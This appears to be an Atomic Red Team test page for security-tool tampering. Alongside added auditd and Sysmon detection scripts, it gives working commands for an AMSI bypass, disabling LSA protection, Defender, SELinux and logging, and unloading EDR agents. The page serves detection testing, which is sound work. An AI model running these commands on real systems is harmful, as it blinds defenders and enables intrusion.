T1685
Disable or Modify Tools
Description from ATT&CK
Adversaries may disable, degrade, or tamper with security tools or applications (e.g., endpoint detection and response (EDR) tools, intrusion detection systems (IDS), antivirus, logging agents, sensors, etc.) to impair or reduce visibility of defensive capabilities. This may include stopping specific services, killing processes, modifying or deleting tool configuration files and Registry keys, or preventing tools from updating. This may also include impairing defenses more broadly by disrupting preventative, detection, and response mechanisms across host, network, and cloud environments.(Citation: SCADAfence_ransomware)
In addition to directly targeting tools, adversaries may block or manipulate indicators and telemetry used for detection. This includes maliciously disabling or redirecting sensors such as Event Tracing for Windows (ETW), modifying event log configurations (e.g., redirecting Security logs), or interfering with logging pipelines and forwarding mechanisms (e.g., SIEM ingestion).(Citation: Microsoft Lamin Sept 2017)(Citation: ETW Palantir)
More advanced techniques include leveraging legitimate drivers or debugging mechanisms to render tools non-functional, bypassing anti-tampering protections, and targeting specific defenses such as Sysmon or cloud monitoring agents. Adversaries may also disrupt broader defensive operations, including update mechanisms, logging infrastructure (e.g., syslog), or event aggregation, further degrading an organization’s ability to detect and respond to malicious activity.(Citation: Cocomazzi FIN7 Reboot)
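A detection counterpart to the logging and policy tampering the description names (syslog, journald, SELinux), matching what Atomic Tests #2 to #8 below do on Linux, as an added example that is not part of Atomic Red Team: it parses auditd records and flags stops of watched units, SELinux dropping to permissive, and writes to watched logging configuration. The unit names come from the tests below; the auditd rule key logconf and the sample records are constructed assumptions.

```python
"""Flag logging-pipeline and MAC tampering in auditd records.

Added detection example for the syslog and journald tampering named in the
description above and exercised by Atomic Tests #2 to #8 (stopping
systemd-journald, rsyslog, cbdaemon or falcon-sensor, rewriting
journald.conf, setenforce 0). It is not Atomic Red Team code. The records
are constructed in the shape of auditd's SERVICE_STOP, MAC_STATUS and
SYSCALL lines; the rule key "logconf" is an assumed name for a watch rule
such as `-w /etc/systemd/journald.conf -p wa -k logconf`.
"""
import re
import shlex

# Units the tests on this page stop; "syslog" is rsyslog's alias on some distributions.
WATCHED_UNITS = {"systemd-journald", "rsyslog", "syslog", "auditd", "falcon-sensor", "cbdaemon"}
# Assumed rule keys attached to file-watch rules on logging configuration.
WATCHED_KEYS = {"logconf"}

RECORD_RE = re.compile(r"^type=(?P<type>\S+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\):\s*(?P<body>.*)$")


def parse_fields(body):
    """Split an audit record body into a dict of key=value pairs.

    systemd's SERVICE_* records keep unit=, comm= and res= inside a quoted
    msg='...' sub-record, so that field is parsed recursively and merged."""
    fields = {}
    for token in shlex.split(body):           # honours the quoting auditd uses
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    inner = fields.pop("msg", None)
    if inner:
        fields.update(parse_fields(inner))
    return fields


def detect(lines):
    """Return (serial, kind, detail) for each record matching a tampering pattern."""
    findings = []
    for line in lines:
        m = RECORD_RE.match(line.strip())
        if not m:
            continue                          # not an audit record, or truncated
        rtype, serial = m["type"], int(m["serial"])
        rec = parse_fields(m["body"])

        if rtype == "SERVICE_STOP" and rec.get("unit") in WATCHED_UNITS:
            findings.append((serial, "service_stop",
                             f"{rec['unit']} stopped via {rec.get('comm', '?')} (res={rec.get('res', '?')})"))
        elif rtype == "MAC_STATUS" and rec.get("enforcing") == "0" and rec.get("old_enforcing") != "0":
            # setenforce 0 flips enforcing 1 -> 0; a 0 -> 0 re-set is not a change
            findings.append((serial, "selinux_permissive",
                             f"SELinux enforcing {rec.get('old_enforcing')} -> 0 by auid={rec.get('auid', '?')}"))
        elif rtype == "SYSCALL" and rec.get("key") in WATCHED_KEYS and rec.get("success") == "yes":
            findings.append((serial, "logging_config_write",
                             f"{rec.get('exe', '?')} (uid={rec.get('uid', '?')}) wrote a watched logging config"))
    return findings


SAMPLE_RECORDS = [  # constructed, not captured from a host
    # Atomic Test #4: systemctl stop rsyslog
    "type=SERVICE_STOP msg=audit(1700000000.101:501): pid=1 uid=0 auid=4294967295 ses=4294967295 "
    "subj=unconfined msg='unit=rsyslog comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'",
    # an unrelated unit stopping; must not alert
    "type=SERVICE_STOP msg=audit(1700000000.102:502): pid=1 uid=0 auid=4294967295 ses=4294967295 "
    "subj=unconfined msg='unit=cups comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'",
    # Atomic Test #7: setenforce 0
    "type=MAC_STATUS msg=audit(1700000000.103:503): enforcing=0 old_enforcing=1 auid=1000 ses=3 enabled=1 old-enabled=1 lsm=selinux res=1",
    # Atomic Test #3: sed rewriting journald.conf, caught by the assumed watch rule
    "type=SYSCALL msg=audit(1700000000.104:504): arch=c000003e syscall=257 success=yes exit=3 items=2 ppid=2301 pid=2310 "
    "auid=1000 uid=0 gid=0 euid=0 comm=\"sed\" exe=\"/usr/bin/sed\" key=\"logconf\"",
    # a read of another file by an unprivileged user, no rule key; must not alert
    "type=SYSCALL msg=audit(1700000000.105:505): arch=c000003e syscall=257 success=yes exit=4 items=1 ppid=900 pid=901 "
    "auid=1000 uid=1000 gid=1000 euid=1000 comm=\"cat\" exe=\"/usr/bin/cat\" key=(null)",
]

if __name__ == "__main__":
    for serial, kind, detail in detect(SAMPLE_RECORDS):
        print(f"{serial} {kind:22} {detail}")
```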
Atomic Tests
- Atomic Test #1: Windows Disable LSA Protection
- Atomic Test #2: Disable journal logging via systemctl utility
- Atomic Test #3: Disable journal logging via sed utility
- Atomic Test #4: Disable syslog
- Atomic Test #5: Disable syslog (freebsd)
- Atomic Test #6: Disable Cb Response
- Atomic Test #7: Disable SELinux
- Atomic Test #8: Stop Crowdstrike Falcon on Linux
- Atomic Test #9: Disable Carbon Black Response
- Atomic Test #10: Disable LittleSnitch
- Atomic Test #11: Disable OpenDNS Umbrella
- Atomic Test #12: Disable macOS Gatekeeper
- Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS
- Atomic Test #14: Unload Sysmon Filter Driver
- Atomic Test #15: Uninstall Sysmon
- Atomic Test #16: AMSI Bypass - AMSI InitFailed
- Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key
- Atomic Test #18: Disable Arbitrary Security Windows Service
- Atomic Test #19: Tamper with Windows Defender ATP PowerShell
- Atomic Test #20: Tamper with Windows Defender Command Prompt
- Atomic Test #21: Tamper with Windows Defender Registry
- Atomic Test #22: Disable Microsoft Office Security Features
- Atomic Test #23: Remove Windows Defender Definition Files
- Atomic Test #24: Stop and Remove Arbitrary Security Windows Service
- Atomic Test #25: Uninstall Crowdstrike Falcon on Windows
- Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder
- Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension
- Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process
- Atomic Test #29: office-365-Disable-AntiPhishRule
- Atomic Test #30: Disable Windows Defender with DISM
- Atomic Test #31: Disable Defender Using NirSoft AdvancedRun
- Atomic Test #32: Kill antimalware protected processes using Backstab
- Atomic Test #33: WinPwn - Kill the event log services for stealth
- Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell
- Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
- Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
- Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
- Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
- Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
- Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder
- Atomic Test #41: Delete Windows Defender Scheduled Tasks
- Atomic Test #42: Clear History
- Atomic Test #43: Suspend History
- Atomic Test #44: Reboot Linux Host via Kernel System Request
- Atomic Test #45: Clear Paging Cache
- Atomic Test #46: Disable Memory Swap
- Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)
- Atomic Test #48: AMSI Bypass - Override AMSI via COM
- Atomic Test #49: AWS - GuardDuty Suspension or Deletion
- Atomic Test #50: Tamper with Defender ATP on Linux/MacOS
- Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe
- Atomic Test #52: Tamper with Windows Defender Registry - Powershell
- Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI
- Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune
- Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO
- Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key
- Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
- Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
- Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd
- Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell
- Atomic Test #61: Freeze PPL-protected process with EDR-Freeze
- Atomic Test #62: Disable ASLR Via sysctl parameters - Linux
- Atomic Test #63: Auditing Configuration Changes on Linux Host
- Atomic Test #64: Auditing Configuration Changes on FreeBSD Host
- Atomic Test #65: Logging Configuration Changes on Linux Host
- Atomic Test #66: Logging Configuration Changes on FreeBSD Host
- Atomic Test #67: Disable Powershell ETW Provider - Windows
- Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)
- Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)
- Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
- Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
- Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
- Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
- Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
- Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
- Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
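Before the tests themselves, a defender-side counterpart as an added example (not Atomic Red Team or Sysmon code): detection logic over constructed Sysmon Event ID 12/13 registry events for the keys Atomic Tests #1, #17, #21, #22 and #26 to #28 touch. The Defender Exclusions key path and Sysmon's HKU\<SID> spelling of per-user hives are assumptions from Windows knowledge, not values taken from this page; the Office rule is generalised across Office apps and versions.

```python
"""Flag security-tool tampering in Sysmon registry events.

Added detection example for Atomic Tests #1, #17, #21, #22 and #26 to #28
below; it is not Atomic Red Team or Sysmon code. The events are constructed
dictionaries shaped like the EventData of Sysmon Event ID 12 (key create /
delete) and 13 (value set): EventType, Image, TargetObject, Details. The
Defender Exclusions key and Sysmon's HKU\\<SID> spelling of user hives are
assumptions from Windows knowledge, not values taken from this page.
"""
import re

DWORD_RE = re.compile(r"^DWORD \(0x([0-9A-Fa-f]{8})\)$")
# Office trust settings, generalised across apps and versions (the page shows Excel 16.0)
OFFICE_RE = re.compile(
    r"^hkcu\\software\\microsoft\\office\\\d+\.\d+\\[^\\]+\\security\\"
    r"(?P<setting>vbawarnings|protectedview\\disable[^\\]+)$")

LSA_RUNASPPL = "hklm\\system\\currentcontrolset\\control\\lsa\\runasppl"
AMSI_PROVIDERS = "hklm\\software\\microsoft\\amsi\\providers\\"
DEFENDER_POLICY = "hklm\\software\\policies\\microsoft\\windows defender\\disableantispyware"
DEFENDER_EXCLUSIONS = "hklm\\software\\microsoft\\windows defender\\exclusions\\"   # assumed path


def normalize(target):
    """Lower-case a TargetObject and fold hive spellings so one rule matches
    HKEY_LOCAL_MACHINE vs HKLM, ControlSet001 vs CurrentControlSet, and the
    HKU\\<SID>\\ form Sysmon uses for the current user's hive."""
    t = target.lower()
    t = t.replace("hkey_local_machine\\", "hklm\\").replace("hkey_current_user\\", "hkcu\\")
    t = re.sub(r"^hku\\s-1-5-[\d-]+(?:_classes)?\\", r"hkcu\\", t)
    return re.sub(r"\\controlset\d{3}\\", r"\\currentcontrolset\\", t)


def dword(details):
    """Integer from Sysmon's 'DWORD (0x00000000)' Details string, else None."""
    m = DWORD_RE.match(details or "")
    return int(m.group(1), 16) if m else None


def classify(event):
    """Label a tampering event, or return None for anything benign, including
    the cleanup direction of each test (RunAsPPL=1, DisableAntiSpyware=0)."""
    eid, etype = event["EventID"], event.get("EventType")
    target = normalize(event["TargetObject"])
    value = dword(event.get("Details"))

    if eid == 13 and target == LSA_RUNASPPL and value == 0:
        return "lsa_protection_disabled"          # Atomic Test #1
    if eid == 12 and etype == "DeleteKey" and target.startswith(AMSI_PROVIDERS):
        return "amsi_provider_removed"            # Atomic Test #17
    if eid == 13 and target == DEFENDER_POLICY and value == 1:
        return "defender_disabled_by_policy"      # Atomic Test #21
    if eid in (12, 13) and etype in ("CreateKey", "SetValue") \
            and target.startswith(DEFENDER_EXCLUSIONS):
        return "defender_exclusion_added"         # Atomic Tests #26 to #28
    m = OFFICE_RE.match(target)
    if eid == 13 and m and value == 1:            # Atomic Test #22
        return ("office_macro_warnings_disabled" if m["setting"] == "vbawarnings"
                else "office_protected_view_disabled")
    return None


def scan(events):
    """Return (label, TargetObject, Image) for every event classify() flags."""
    return [(label, e["TargetObject"], e.get("Image", "?"))
            for e in events for label in [classify(e)] if label]


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not captured telemetry
    # Atomic Test #1: reg.exe sets RunAsPPL to 0
    {"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\RunAsPPL", "Details": "DWORD (0x00000000)"},
    # hardening in the other direction, spelled with the long hive name; must not alert
    {"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\RunAsPPL", "Details": "DWORD (0x00000001)"},
    # Atomic Test #17: the Defender AMSI provider key is deleted
    {"EventID": 12, "EventType": "DeleteKey", "Image": PS,
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}", "Details": None},
    # Atomic Test #21
    {"EventID": 13, "EventType": "SetValue", "Image": PS,
     "TargetObject": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware", "Details": "DWORD (0x00000001)"},
    # Atomic Test #26: the Defender service itself writes the new exclusion
    {"EventID": 13, "EventType": "SetValue", "Image": "MsMpEng.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Temp", "Details": "DWORD (0x00000000)"},
    # Atomic Test #22 as Sysmon would log it: the user hive appears as HKU\<SID> (SID constructed)
    {"EventID": 13, "EventType": "SetValue", "Image": PS,
     "TargetObject": "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings", "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "EventType": "SetValue", "Image": PS,
     "TargetObject": "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV", "Details": "DWORD (0x00000001)"},
    # an ordinary Explorer setting; must not alert
    {"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for label, target, image in scan(SAMPLE_EVENTS):
        print(f"{label:32} {image} -> {target}")
```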
Atomic Test #1: Windows Disable LSA Protection
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data. Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
Supported Platforms: Windows
auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
Cleanup Commands
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
Atomic Test #2: Disable journal logging via systemctl utility
The atomic test disables journal logging using the built-in systemctl utility.
Supported Platforms: Linux
auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo systemctl stop systemd-journald #disables journal logging
Cleanup Commands
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
Atomic Test #3: Disable journal logging via sed utility
The atomic test disables journal logging by replacing the value of the "Storage" parameter with "none" in the journald.conf file, so any new journal entries are only held temporarily in memory and not written to disk.
Supported Platforms: Linux
auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
Cleanup Commands
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
Atomic Test #4: Disable syslog
Disables syslog collection
Supported Platforms: Linux
auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| package_checker | Package checking command for linux. | string | (rpm -q rsyslog 2>&1 >/dev/null) |
| package_installer | Package installer command for linux. Default yum | string | (which yum && yum -y install epel-release rsyslog) |
| flavor_command | Command to disable syslog collection. Default: newer rsyslog commands (older command: service rsyslog stop ; chkconfig rsyslog off) | string | systemctl stop rsyslog ; systemctl disable rsyslog |
| cleanup_command | Command to enable syslog collection. Default: newer rsyslog commands (older command: service rsyslog start ; chkconfig rsyslog on) | string | systemctl start rsyslog ; systemctl enable rsyslog |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
#{flavor_command}
Cleanup Commands
#{cleanup_command}
Dependencies: Run with sh!
Description: The rsyslog package must be on the system
Check Prereq Commands
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
Get Prereq Commands
sudo #{package_installer}
Atomic Test #5: Disable syslog (freebsd)
Disables syslog collection
Supported Platforms: Linux
auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
service syslogd stop
sysrc syslogd_enable="NO"
Cleanup Commands
sysrc syslogd_enable="YES"
service syslogd start
Atomic Test #6: Disable Cb Response
Disable the Cb Response service
Supported Platforms: Linux
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
Attack Commands: Run with sh!
if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq "6" ];
then
service cbdaemon stop
chkconfig cbdaemon off
elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq "7" ];
then
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
Atomic Test #7: Disable SELinux
Disables SELinux enforcement
Supported Platforms: Linux
auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
setenforce 0
Cleanup Commands
setenforce 1
Dependencies: Run with sh!
Description: SELinux must be installed
Check Prereq Commands
which setenforce
Get Prereq Commands
echo "SELinux is not installed"; exit 1
Atomic Test #8: Stop Crowdstrike Falcon on Linux
Stop and disable Crowdstrike Falcon on Linux
Supported Platforms: Linux
auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
Cleanup Commands
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
Atomic Test #9: Disable Carbon Black Response
Disables Carbon Black Response
Supported Platforms: macOS
auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
Cleanup Commands
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
Atomic Test #10: Disable LittleSnitch
Disables LittleSnitch
Supported Platforms: macOS
auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
Cleanup Commands
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
Atomic Test #11: Disable OpenDNS Umbrella
Disables OpenDNS Umbrella
Supported Platforms: macOS
auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
Cleanup Commands
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
Atomic Test #12: Disable macOS Gatekeeper
Disables macOS Gatekeeper
Supported Platforms: macOS
auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo spctl --master-disable
Cleanup Commands
sudo spctl --master-enable
Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
Supported Platforms: macOS
auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist |
| userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
Cleanup Commands
sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}
Atomic Test #14: Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, run the prereq commands; they should fail with the error "sysmon filter must be loaded".
Supported Platforms: Windows
auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
fltmc.exe unload #{sysmon_driver}
Cleanup Commands
sysmon -u > nul 2>&1
sysmon -accepteula -i > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i > nul 2>&1
Dependencies: Run with powershell!
Description: Sysmon must be downloaded
Check Prereq Commands
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr /i Sysmon 2> nul") -or (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe")) { exit 0 } else { exit 1 }
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sysmon" -Force
Description: Sysmon must be installed
Check Prereq Commands
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
Get Prereq Commands
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i }
Description: sysmon filter must be loaded
Check Prereq Commands
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
Get Prereq Commands
if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
& "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u
& "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i
}else{
sysmon -u
sysmon -accepteula -i
}
Atomic Test #15: Uninstall Sysmon
Uninstall Sysinternals Sysmon for Defense Evasion
Supported Platforms: Windows
auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder\T1685\bin\sysmon.exe |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
sysmon -u
Cleanup Commands
sysmon -i -accepteula >nul 2>&1
Dependencies: Run with powershell!
Description: Sysmon executable must be available
Check Prereq Commands
if(cmd /c where sysmon) {exit 0} else {exit 1}
Get Prereq Commands
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
Description: Sysmon must be installed
Check Prereq Commands
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
Get Prereq Commands
cmd /c sysmon -i -accepteula
Atomic Test #16: AMSI Bypass - AMSI InitFailed
An easy way to bypass AMSI inspection is to patch the DLL in memory, setting the "amsiInitFailed" field to true. Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Supported Platforms: Windows
auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd
Attack Commands: Run with powershell!
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Cleanup Commands
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" to verify that it is gone.
Supported Platforms: Windows
auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Cleanup Commands
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
Atomic Test #18: Disable Arbitrary Security Windows Service
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon execution, information will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService".
Supported Platforms: Windows
auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| service_name | The name of the service to stop | string | McAfeeDLPAgentService |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
Cleanup Commands
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
Atomic Test #19: Tamper with Windows Defender ATP PowerShell
Attempts to disable scheduled scanning and other parts of Windows Defender ATP. Upon execution, Virus and Threat Protection will show as disabled in Windows Settings.
Supported Platforms: Windows
auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
Cleanup Commands
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
Atomic Test #20: Tamper with Windows Defender Command Prompt
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.
Supported Platforms: Windows
auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2
